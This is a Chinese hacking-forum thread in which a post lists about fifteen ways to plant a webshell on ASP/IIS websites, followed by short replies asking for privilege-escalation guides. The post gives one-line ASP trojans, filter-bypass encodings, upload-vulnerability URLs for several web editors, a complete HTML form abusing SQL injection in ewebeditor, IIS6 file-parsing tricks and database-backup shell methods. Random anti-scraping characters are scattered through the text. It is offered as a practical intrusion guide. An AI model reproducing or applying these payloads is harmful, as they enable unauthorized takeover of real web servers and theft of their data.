返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
! U6 X( B4 e& G5 K; ~, I0 ~7 b* R3 h
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp( ?7 h# ]7 k* H- Q( _/ y
. c/ V+ T  B$ V) @
3.上传漏洞:) J8 u5 Y% _: r
5 \6 R# ^1 V, y; b5 H
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x003 T. G1 g2 v5 p/ }. g) k0 s

9 J0 D6 [* {0 l逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件3 a- t+ P/ T/ g2 }

; T1 t2 P/ y* H. ~7 V7 l3 i5 d雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
; e' m- W0 x$ v! |* [  ^: h然后在上传文件里面填要传的图片格式的ASP木马% h2 D% r9 o$ E0 m1 F
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
& Q0 G$ w3 J  V; i4 }$ p& @- V4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传' n3 a- s( ~1 K2 V: k4 i
6 H: x' X! m/ |( X
<html>1 |' L# B; V3 R4 `
<head>
. s$ C0 C0 P% a# ]5 p<title>ewebeditor upload.asp上传利用</title>! l& ]0 W3 Y5 j3 Q4 q" H/ D
</head>! C' U* O* |3 E
<body>
# {9 H1 |- o. D: Z' I0 z7 H- Y<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
! B% L; W9 b; M1 G! g* u% ]4 V<input type=file name=uploadfile size=100><br><br>" b7 v9 f. G! T
<input type=submit value=Fuck>
; {7 I* v! G: C</form>
- ^& R, V0 |& k3 t" O! Q$ p; @</body>, G, {4 O" P6 C; a( e6 ^  b; R7 W
</form>
1 w- P9 x2 C1 d! D+ `</html>( ]0 J0 }7 V4 f+ p( B
& J1 P/ a% c( C2 y9 Z8 b6 p
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
5 M/ _( u# R" C* y0 n2 y5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
; A+ [  R, J! \* z& R7 h- ~$ O1 A0 j6 A
$ o+ |1 z* j) v; L: x" a, m  k: x利用windows2003解析。建立zjq.asp的文件夹% g3 W% E' _: Q  `1 d4 V% k$ m9 L
4 {3 T$ Z- a2 Q/ V) o+ L! d; P8 R
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型& }- L7 |7 E% y" b
: M$ ?8 j/ z9 T; N
7.cuteeditor:类似ewebeditor
% ~$ e3 @/ {: |& D
$ E4 T& M, g7 R: p, ~! y+ @8.htmleditor:同上
+ l1 N# z$ u/ _0 x* n. t
  Y1 a2 G$ Y" {7 o/ E6 V9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破4 h- w$ b0 o8 O$ ]7 Q3 @+ T7 O

- I# _8 T+ Q/ D" t7 j( ]5 O<%execute request("value")%><%'<% loop <%:%>
7 |$ p# e" q8 v* X& q: H" y" Y* C' F5 ]; K$ \- `
<%'<% loop <%:%><%execute request("value")%>
$ e! ]1 W% ]. [, G7 H$ }$ @) B# P% a' r1 E( R
<%execute request("value")'<% loop <%:%>: w; L" B# f8 ~7 ~6 p% ^
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
8 U4 m5 a- g0 ?- B& }$ L& [/ t" w, o: T# b
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
2 x# _+ R5 F7 n! z0 w
2 H* C6 `) r4 r& ?6 Y( t11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
9 G. C5 c' c4 I6 v; f, C+ n( d4 T$ ~/ k) B! d5 t4 h' m- O: ^
解析漏洞得到webshell
9 o3 E8 w$ m& h4 r# t8 O
3 P  q; L: B9 w) @& v$ O" }12.mssql差异备份,日志备份,前提需知道web路径# K! D% O) P1 _+ [, \
/ Z0 `/ P8 f* E: E
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell# F4 n% O8 t) g% H7 P
  t; Q$ U- H, O6 N1 y
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
. t- v& e. L" X# `6 t0 x
' N. s- f  k# C8 b15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
2 E% Q1 s6 B0 x: t
" L% s8 `" ^1 f# i2 D以上只是本人的一些拙见,并不完善,以后想到了再继续添加
2 m( |! }5 V4 b, n2 ^/ h  a不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 & q. I  r# ]% l1 x  B

; w. H5 k8 ^6 T* Y; U7 P: b4 p1 q+ o! o4 A" k5 `
很好啊、基本的入侵方法都包含了6 b7 B) ?# `7 V5 m% E
4 J  H9 Y$ J, o+ X2 N" S! {; A
最好来个提权的帖子再。
7 A% y! Q' {( ^5 R  P/ D- j; X' `* ~! n2 ~' q9 |
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表